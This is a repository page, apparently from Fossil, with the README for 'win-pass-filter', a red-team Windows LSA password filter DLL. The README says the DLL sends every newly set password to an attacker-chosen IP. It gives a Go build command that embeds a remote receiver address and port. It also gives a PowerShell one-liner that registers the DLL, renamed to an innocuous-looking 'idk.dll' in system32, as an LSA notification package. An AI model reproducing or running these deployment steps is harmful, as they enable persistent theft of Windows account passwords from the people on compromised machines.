Artifact 852c2c475e9acbb034513e41e6f0bf0f0a9afcdf10fc5af559c7646a12e5a83d:

File README.md — part of check-in [f2dea56b19] at 2019-06-07 00:51:53 on branch trunk — Initial Commit (user: brimstone size: 918)

win-pass-filter

stolen from https://github.com/iDigitalFlame/redteam-tools

This is a windows LSA password filter that sends the new password to an IP of your choosing.

Build

Simply build for windows with CGO enabled and the appropriate receiver listing port.

GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared -ldflags 'main.remote=192.168.0.100:4444'

Install

Copy the filter.dll to somewhere like c:\windows\system32\idk.dll and install with powershell

powershell -com "$a='idk';$b=(Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages').'Notification Packages'; Set-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value ""$b`r`n$a"""

If you change the name of the dll in c:\windows\system32 then also update the $a variable.

Reboot when finished.

Artifact Content

Artifact 852c2c475e9acbb034513e41e6f0bf0f0a9afcdf10fc5af559c7646a12e5a83d:

win-pass-filter

Build

Install